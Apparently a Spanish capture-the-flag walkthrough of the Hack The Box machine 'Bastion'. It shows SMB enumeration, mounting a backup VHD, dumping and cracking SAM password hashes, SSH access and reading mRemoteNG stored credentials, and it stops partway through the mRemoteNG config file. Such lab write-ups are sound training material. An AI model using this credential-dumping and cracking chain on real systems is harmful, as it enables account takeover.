Bastion [EASY🟢]
Dificultad: Fácil
1- Reconocimiento y escaneo
1.1 Ping
1.1 Pingping -c 1 10.10.10.134PING 10.10.10.134 (10.10.10.134) 56(84) bytes of data.
64 bytes from 10.10.10.134: icmp_seq=1 ttl=127 time=173 ms
--- 10.10.10.134 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 173.374/173.374/173.374/0.000 msPodemos notar que se trata de una maquina Windows, debido al TTL:
TTL <= 64 >>(Linux)
TTL <= 128 >> (Windows)1.2 Nmap
1.2 Nmapnmap -sS -sCV -p- -open --min-rate 5000 -Pn -vvv -oN escaneo.txt 10.10.10.134───────┬──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
│ File: escaneo.txt
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │ # Nmap 7.95 scan initiated Sat Mar 8 15:21:26 2025 as: /usr/lib/nmap/nmap --privileged -sS -sCV -p- -open --min-rate 5000 -Pn -vvv -oN escaneo.txt 10.10.10.134
2 │ Nmap scan report for 10.10.10.134
3 │ Host is up, received user-set (0.18s latency).
4 │ Scanned at 2025-03-08 15:21:27 -03 for 87s
5 │ Not shown: 65522 closed tcp ports (reset)
6 │ PORT STATE SERVICE REASON VERSION
7 │ 22/tcp open ssh syn-ack ttl 127 OpenSSH for_Windows_7.9 (protocol 2.0)
8 │ | ssh-hostkey:
9 │ | 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
10 │ | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bG3TRRwV6dlU1lPbviOW+3fBC7wab+KSQ0Gyhvf9Z1OxFh9v5e6GP4rt5Ss76ic1oAJPIDvQwGlKdeUEnjtEtQXB/78Ptw6IPPPPwF5dI1W4GvoGR4MV5Q6CPpJ6HLIJdvA
│ cn3isTCZgoJT69xRK0ymPnqUqaB+/ptC4xvHmW9ptHdYjDOFLlwxg17e7Sy0CA67PW/nXu7+OKaIOx0lLn8QPEcyrYVCWAqVcUsgNNAjR4h1G7tYLVg3SGrbSmIcxlhSMexIFIVfR37LFlNIYc6Pa58lj2MSQLusIzRoQxaXO4YSp
│ /dM1tk7CN2cKx1PTd9VVSDH+/Nq0HCXPiYh3
11 │ | 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
12 │ | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF1Mau7cS9INLBOXVd4TXFX/02+0gYbMoFzIayeYeEOAcFQrAXa1nxhHjhfpHXWEj2u0Z/hfPBzOLBGi/ngFRUg=
13 │ | 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
14 │ |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB34X2ZgGpYNXYb+KLFENmf0P0iQ22Q0sjws2ATjFsiN
15 │ 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
16 │ 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
17 │ 445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds
18 │ 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
19 │ |_http-server-header: Microsoft-HTTPAPI/2.0
20 │ |_http-title: Not Found
21 │ 47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
22 │ |_http-server-header: Microsoft-HTTPAPI/2.0
23 │ |_http-title: Not Found
24 │ 49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
25 │ 49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
26 │ 49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
27 │ 49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
28 │ 49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
29 │ 49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
30 │ 49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
31 │ Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
32 │
33 │ Host script results:
34 │ | smb2-time:
35 │ | date: 2025-03-08T18:22:45
36 │ |_ start_date: 2025-03-08T18:19:47
37 │ |_clock-skew: mean: -19m59s, deviation: 34m36s, median: 0s
38 │ | p2p-conficker:
39 │ | Checking for Conficker.C or higher...
40 │ | Check 1 (port 26941/tcp): CLEAN (Couldn't connect)
41 │ | Check 2 (port 11143/tcp): CLEAN (Couldn't connect)
42 │ | Check 3 (port 18741/udp): CLEAN (Timeout)
43 │ | Check 4 (port 20058/udp): CLEAN (Failed to receive data)
44 │ |_ 0/4 checks are positive: Host is CLEAN or ports are blocked
45 │ | smb-security-mode:
46 │ | account_used: guest
47 │ | authentication_level: user
48 │ | challenge_response: supported
49 │ |_ message_signing: disabled (dangerous, but default)
50 │ | smb2-security-mode:
51 │ | 3:1:1:
52 │ |_ Message signing enabled but not required
53 │ | smb-os-discovery:
54 │ | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
55 │ | Computer name: Bastion
56 │ | NetBIOS computer name: BASTION\x00
57 │ | Workgroup: WORKGROUP\x00
58 │ |_ System time: 2025-03-08T19:22:44+01:00
59 │
60 │ Read data files from: /usr/share/nmap
61 │ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
62 │ # Nmap done at Sat Mar 8 15:22:54 2025 -- 1 IP address (1 host up) scanned in 88.87 seconds
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────Estamos ante un entorno de Windows Server, podemos ver el puerto 22 correspondiente a un servidor SSH, los puertos comunes de Windows 135 y 139, tambien tenemos el puerto 445 para almacenamiento en recursos compartidos vía SMB, y por ultimo el puerto 5985 con el que luego podremos conectarnos vía evil-winrm
1.3 crackmapexec
1.3 crackmapexeccrackmapexec smb 10.10.10.134❯ crackmapexec smb 10.10.10.134
SMB 10.10.10.134 445 BASTION [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)Windows Server 2016 Standard compilación 14393 x64(64 bits), el nombre de la maquina "BASTION" y el dominio "Bastion", el SMB no esta firmado, y concretamente estamos antes un SMB de versión 1
1.4 smbclient (Listar recursos compartidos)
1.4 smbclient (Listar recursos compartidos)smbclient -L 10.10.10.134 -N❯ smbclient -L 10.10.10.134 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availableTenemos los recursos compartidos comunes de un servicio SMB(ADMIN$, C$ y IPC$), ademas de un recurso compartido que parece almacenar Backups de la maquina, "Backups"
1.5 smbmap (Permisos de sesión null en recursos compartidos)
1.5 smbmap (Permisos de sesión null en recursos compartidos)smbmap -H 10.10.10.134 -u 'null'❯ smbmap -H 10.10.10.134 -u 'null'
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[!] Unable to remove test file at \\10.10.10.134\Backups\INORFGVYQT.txt, please remove manually
[+] IP: 10.10.10.134:445 Name: 10.10.10.134 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Backups READ, WRITE
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
[*] Closed 1 connectionsTenemos permisos de escritura y lectura dentro del recurso compartido "Backups"
2- Explotación
2.1 Backups SMB y QEMU NBD
2.1 Backups SMB y QEMU NBDVamos a conectarnos vía SMB al recurso compartido "Backups", utilizamos "smbclient":
smbclient //10.10.10.134/Backups❯ smbclient //10.10.10.134/Backups
Password for [WORKGROUP\t0mz]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Apr 16 07:02:11 2019
.. D 0 Tue Apr 16 07:02:11 2019
note.txt AR 116 Tue Apr 16 07:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 09:43:08 2019
WindowsImageBackup Dn 0 Fri Feb 22 09:44:02 2019
5638911 blocks of size 4096. 1179967 blocks available
smb: \> Vamos a "WindowsImageBackup":
smb: \> cd WindowsImageBackup\
smb: \WindowsImageBackup\> dir
. Dn 0 Fri Feb 22 09:44:02 2019
.. Dn 0 Fri Feb 22 09:44:02 2019
L4mpje-PC Dn 0 Fri Feb 22 09:45:32 2019
5638911 blocks of size 4096. 1179708 blocks available
smb: \WindowsImageBackup\> L4mpje-PC:
smb: \WindowsImageBackup\> cd L4mpje-PC\
smb: \WindowsImageBackup\L4mpje-PC\> dir
. Dn 0 Fri Feb 22 09:45:32 2019
.. Dn 0 Fri Feb 22 09:45:32 2019
Backup 2019-02-22 124351 Dn 0 Fri Feb 22 09:45:32 2019
Catalog Dn 0 Fri Feb 22 09:45:32 2019
MediaId An 16 Fri Feb 22 09:44:02 2019
SPPMetadataCache Dn 0 Fri Feb 22 09:45:32 2019
5638911 blocks of size 4096. 1179711 blocks available
smb: \WindowsImageBackup\L4mpje-PC\> "Backup 2019-02-22 124351":
smb: \WindowsImageBackup\L4mpje-PC\> cd Backup 2019-02-22 124351\
cd \WindowsImageBackup\L4mpje-PC\Backup\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \WindowsImageBackup\L4mpje-PC\> Podemos ver que no nos deja, asi que para entrar al backup de esa fecha, vamos a crearnos una montura en la carpeta "/mnt" de Kali, de tipo "CIFS":
❯ sudo mkdir /mnt/smb
❯ sudo mount -t cifs //10.10.10.134/Backups /mnt/smb
Password for root@//10.10.10.134/Backups:Ahora vamos a la carpeta "smb" donde tenemos la montura:
❯ cd /mnt/smb
❯ ls
WindowsImageBackup note.txt SDT65CB.tmpAhora vamos a ejecutar el comando "tree" para ver toda la estructura del recurso compartido:
❯ tree
.
├── SDT65CB.tmp
├── WindowsImageBackup
│ └── L4mpje-PC
│ ├── Backup 2019-02-22 124351
│ │ ├── 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
│ │ ├── 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
│ │ ├── BackupSpecs.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
│ │ └── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
│ ├── Catalog
│ │ ├── BackupGlobalCatalog
│ │ └── GlobalCatalog
│ ├── MediaId
│ └── SPPMetadataCache
│ └── {cd113385-65ff-4ea2-8ced-5630f6feca8f}
└── note.txt
6 directories, 19 filesTenemos 2 archivos ".vhd" correspondientes a un disco virtual(VHD = Virtual Hard Disk)
❯ ls -la /mnt/smb/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351
drwxr-xr-x root root 0 B Fri Feb 22 09:45:32 2019 .
drwxr-xr-x root root 0 B Fri Feb 22 09:45:32 2019 ..
.rwxr-xr-x root root 36 MB Fri Feb 22 09:44:03 2019 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
.rwxr-xr-x root root 5.0 GB Fri Feb 22 09:45:32 2019 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
.rwxr-xr-x root root 1.2 KB Fri Feb 22 09:45:32 2019 BackupSpecs.xml
.rwxr-xr-x root root 1.1 KB Fri Feb 22 09:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
.rwxr-xr-x root root 8.7 KB Fri Feb 22 09:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
.rwxr-xr-x root root 6.4 KB Fri Feb 22 09:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
.rwxr-xr-x root root 2.8 KB Fri Feb 22 09:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
.rwxr-xr-x root root 1.5 KB Fri Feb 22 09:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
.rwxr-xr-x root root 1.4 KB Fri Feb 22 09:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
.rwxr-xr-x root root 3.8 KB Fri Feb 22 09:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
.rwxr-xr-x root root 3.9 KB Fri Feb 22 09:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
.rwxr-xr-x root root 6.9 KB Fri Feb 22 09:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
.rwxr-xr-x root root 2.3 MB Fri Feb 22 09:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xmlUno de ellos, concretamente el 2do, pesa 5GB
Para visualizar este disco duro virtual, vamos a utilizar una herramienta llamada "qemu-nbd", para otra vez realizar una montura, pero esta vez con el disco virtual
Vamos a crear una carpeta en el directorio "/mnt" que se llame "vhd":
❯ mkdir /mnt/vhd(Para utilizar "qemu-nbd", es necesario tener instalado las utilidades de qemu, "apt install qemu-utils")
Y antes de realizar la montura del VHD, vamos a importar un modulo al sistema, llamado "nbd" utilizando el comando "modprobe"
❯ modprobe nbdY ahora con "qemu-nbd" vamos a poder montar el disco duro virtual mediante el protocolo NBD, si hacemos un "ls /dev":
❯ ls /dev
block pts fb0 nbd0 nbd6 rtc stdout tty18 tty29 tty4 tty50 tty61 urandom vcsa2 vcsu6
bsg shm full nbd1 nbd7 rtc0 tty tty19 tty3 tty40 tty51 tty62 userfaultfd vcsa3 vcsu7
bus snd fuse nbd10 nbd8 sda tty0 tty2 tty30 tty41 tty52 tty63 vcs vcsa4 vga_arbiter
char vfio hidraw0 nbd11 nbd9 sda1 tty1 tty20 tty31 tty42 tty53 tty7 vcs1 vcsa5 vhci
disk autofs hpet nbd12 null sda2 tty10 tty21 tty32 tty43 tty54 tty8 vcs2 vcsa6 vhost-net
dri btrfs-control hwrng nbd13 nvram sda5 tty11 tty22 tty33 tty44 tty55 tty9 vcs3 vcsa7 vhost-vsock
fd cdrom initctl nbd14 port sg0 tty12 tty23 tty34 tty45 tty56 ttyS0 vcs4 vcsu vmci
hugepages console kmsg nbd15 ppp sg1 tty13 tty24 tty35 tty46 tty57 ttyS1 vcs5 vcsu1 vsock
input core log nbd2 psaux snapshot tty14 tty25 tty36 tty47 tty58 ttyS2 vcs6 vcsu2 zero
mapper cpu_dma_latency loop-control nbd3 ptmx sr0 tty15 tty26 tty37 tty48 tty59 ttyS3 vcs7 vcsu3
mqueue cuse mem nbd4 random stderr tty16 tty27 tty38 tty49 tty6 uhid vcsa vcsu4
net dmmidi midi nbd5 rfkill stdin tty17 tty28 tty39 tty5 tty60 uinput vcsa1 vcsu5Veremos varias carpetas "nbd's" que son parte del protocolo NBD y espacios para montar el disco virtual, en mi caso utilizare el "nbd0":
❯ qemu-nbd -r -c /dev/nbd0 "/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd"Ahora, el disco virtual se cargo en "/dev/nbd0p1"
Ahora quedaria por montar este directorio, dentro de "/mnt/vhd":
❯ cd /mnt/vhd
❯ mount /dev/nbd0p1 /mnt/vhd
❯ ls -la
drwxrwxrwx root root 0 B Fri Feb 22 09:39:26 2019 '$Recycle.Bin'
drwxrwxrwx root root 12 KB Fri Feb 22 09:39:17 2019 .
drwxr-xr-x root root 4.0 KB Sun Mar 9 05:37:44 2025 ..
lrwxrwxrwx root root 31 B Tue Jul 14 01:53:55 2009 'Documents and Settings' ⇒ /mnt/virtual_hard_bastion/Users
drwxrwxrwx root root 0 B Mon Jul 13 23:37:05 2009 PerfLogs
drwxrwxrwx root root 4.0 KB Mon Apr 11 23:21:18 2011 'Program Files'
drwxrwxrwx root root 4.0 KB Tue Jul 14 01:53:55 2009 ProgramData
drwxrwxrwx root root 0 B Fri Feb 22 09:39:17 2019 Recovery
drwxrwxrwx root root 4.0 KB Fri Feb 22 09:43:53 2019 'System Volume Information'
drwxrwxrwx root root 4.0 KB Fri Feb 22 09:39:21 2019 Users
drwxrwxrwx root root 16 KB Fri Feb 22 09:40:48 2019 Windows
.rwxrwxrwx root root 24 B Wed Jun 10 18:42:20 2009 autoexec.bat
.rwxrwxrwx root root 10 B Wed Jun 10 18:42:20 2009 config.sys
.rwxrwxrwx root root 2.0 GB Fri Feb 22 09:38:21 2019 pagefile.sysEsto ya seria el backup
2.2 SAM y SYSTEM
2.2 SAM y SYSTEMVamos a dirigirnos a la siguiente ruta para conseguir el hash SAM de la maquina:
❯ cd Windows/System32/config
❯ ls -l | grep 'SAM'
.rwxrwxrwx root root 256 KB Fri Feb 22 09:39:21 2019 SAM
.rwxrwxrwx root root 1.0 KB Mon Apr 11 23:23:51 2011 SAM.LOG
.rwxrwxrwx root root 21 KB Fri Feb 22 09:39:21 2019 SAM.LOG1
.rwxrwxrwx root root 0 B Mon Jul 13 23:03:40 2009 SAM.LOG2
❯ ls -l | grep 'SYSTEM'
.rwxrwxrwx root root 9.3 MB Fri Feb 22 09:43:54 2019 SYSTEM
.rwxrwxrwx root root 1.0 KB Mon Apr 11 23:23:51 2011 SYSTEM.LOG
.rwxrwxrwx root root 256 KB Fri Feb 22 09:43:54 2019 SYSTEM.LOG1
.rwxrwxrwx root root 0 B Mon Jul 13 23:03:40 2009 SYSTEM.LOG2Ahora, vamos a utilizar la herramienta "impacket-secretsdump" para obtener el hash:
impacket-secretsdump -sam SAM -system SYSTEM LOCAL❯ impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Cleaning up...Almacenamos los hashes en un archivo de texto:
❯ nvim hashes_sam
❯ cat hashes_sam
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
│ File: hashes_sam
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │ Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
2 │ Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
3 │ L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────2.3 Obtención de shell con SSH
2.3 Obtención de shell con SSHY ahora vamos a utilizar "John The Ripper" para crackear estos hashes:
(En mi caso utilizare el diccionario "rockyou")
john --wordlist=/usr/share/wordlists/rockyou.txt hashes_sam --format=NT❯ john --wordlist=/usr/share/wordlists/rockyou.txt hashes_sam --format=NT
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
(Administrator)
bureaulampje (L4mpje)
2g 0:00:00:00 DONE (2025-03-09 05:46) 3.333g/s 15659Kp/s 15659Kc/s 15667KC/s burg772v..burdy1
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.Usuario: L4mpje
Contraseña: bureaulampjeAhora teniendo la contraseña y el usuario, vamos a conectanos mediante SSH
ssh L4mpje@10.10.10.134Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>
l4mpje@BASTION C:\Users\L4mpje> 2.4 Obtención de la flag user
2.4 Obtención de la flag userLa flag de user se encuentra dentro de la ruta absoluta "C:\Users\L4mpje\Desktop\user.txt":
l4mpje@BASTION C:\Users\L4mpje\Desktop>type "C:\Users\L4mpje\Desktop\user.txt"
a0ec39679d666dd98a7a9c6a77cb064d
l4mpje@BASTION C:\Users\L4mpje\Desktop> 3- Escalado de privilegios
3.1 mRemoteNG
3.1 mRemoteNGVamos a irnos a "Program Files (x86)":
l4mpje@BASTION C:\Users\L4mpje\Desktop>cd ..
l4mpje@BASTION C:\Users\L4mpje>cd ..
l4mpje@BASTION C:\Users>cd ..
l4mpje@BASTION C:\>dir
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692
Directory of C:\
16-04-2019 11:02 <DIR> Backups
12-09-2016 12:35 <DIR> Logs
22-02-2019 14:42 <DIR> PerfLogs
31-01-2022 17:39 <DIR> Program Files
22-02-2019 14:01 <DIR> Program Files (x86)
22-02-2019 13:50 <DIR> Users
31-01-2022 17:52 <DIR> Windows
0 File(s) 0 bytes
7 Dir(s) 4.824.477.696 bytes free
l4mpje@BASTION C:\>cd Program Files (x86)
l4mpje@BASTION C:\Program Files (x86)>dir
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692
Directory of C:\Program Files (x86)
22-02-2019 14:01 <DIR> .
22-02-2019 14:01 <DIR> ..
16-07-2016 14:23 <DIR> Common Files
23-02-2019 09:38 <DIR> Internet Explorer
16-07-2016 14:23 <DIR> Microsoft.NET
22-02-2019 14:01 <DIR> mRemoteNG
23-02-2019 10:22 <DIR> Windows Defender
23-02-2019 09:38 <DIR> Windows Mail
23-02-2019 10:22 <DIR> Windows Media Player
16-07-2016 14:23 <DIR> Windows Multimedia Platform
16-07-2016 14:23 <DIR> Windows NT
23-02-2019 10:22 <DIR> Windows Photo Viewer
16-07-2016 14:23 <DIR> Windows Portable Devices
16-07-2016 14:23 <DIR> WindowsPowerShell
0 File(s) 0 bytes
14 Dir(s) 4.824.477.696 bytes free
l4mpje@BASTION C:\Program Files (x86)> Tenemos el "mRemoteNG" instalado, que es un software de escritorio remoto, y desde este mismo software, si el usuario previamente guardo las contraseñas en el software para no volver a colocarlas dentro del software, es probable que esas contraseñas se almacenen en el mismo software, estas mismas contraseñas almacenadas en los archivos de mRemoteNG vienen protegidas y hasheadas, pero este cifrado se puede romper
Vamos a irnos a la siguiente ruta absoluta "C:\Users\L4mpje\AppData\Roaming\mRemoteNG" y vamos a listar los directorios:
l4mpje@BASTION C:\>cd "C:\Users\L4mpje\AppData\Roaming\mRemoteNG"
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692
Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG
22-02-2019 14:03 <DIR> .
22-02-2019 14:03 <DIR> ..
22-02-2019 14:03 6.316 confCons.xml
22-02-2019 14:02 6.194 confCons.xml.20190222-1402277353.backup
22-02-2019 14:02 6.206 confCons.xml.20190222-1402339071.backup
22-02-2019 14:02 6.218 confCons.xml.20190222-1402379227.backup
22-02-2019 14:02 6.231 confCons.xml.20190222-1403070644.backup
22-02-2019 14:03 6.319 confCons.xml.20190222-1403100488.backup
22-02-2019 14:03 6.318 confCons.xml.20190222-1403220026.backup
22-02-2019 14:03 6.315 confCons.xml.20190222-1403261268.backup
22-02-2019 14:03 6.316 confCons.xml.20190222-1403272831.backup
22-02-2019 14:03 6.315 confCons.xml.20190222-1403433299.backup
22-02-2019 14:03 6.316 confCons.xml.20190222-1403486580.backup
22-02-2019 14:03 51 extApps.xml
22-02-2019 14:03 5.217 mRemoteNG.log
22-02-2019 14:03 2.245 pnlLayout.xml
22-02-2019 14:01 <DIR> Themes
14 File(s) 76.577 bytes
3 Dir(s) 4.824.477.696 bytes free
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>Hay un archivo llamado "confCons.xml" que es el archivo XML que almacena las contraseñas cifradas:
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GC
M" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0
oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
<Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Userna
me="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" Rend
eringEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeo
ut="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" Disp
layThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" R
edirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" Redire
ctKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEn
coding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPa
ssword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostna
me="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="
false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnab
leFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" I
nheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false"
InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" Inhe
ritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleS
ession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="fa
lse" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoad
BalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" Inheri
tExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false"
InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNC
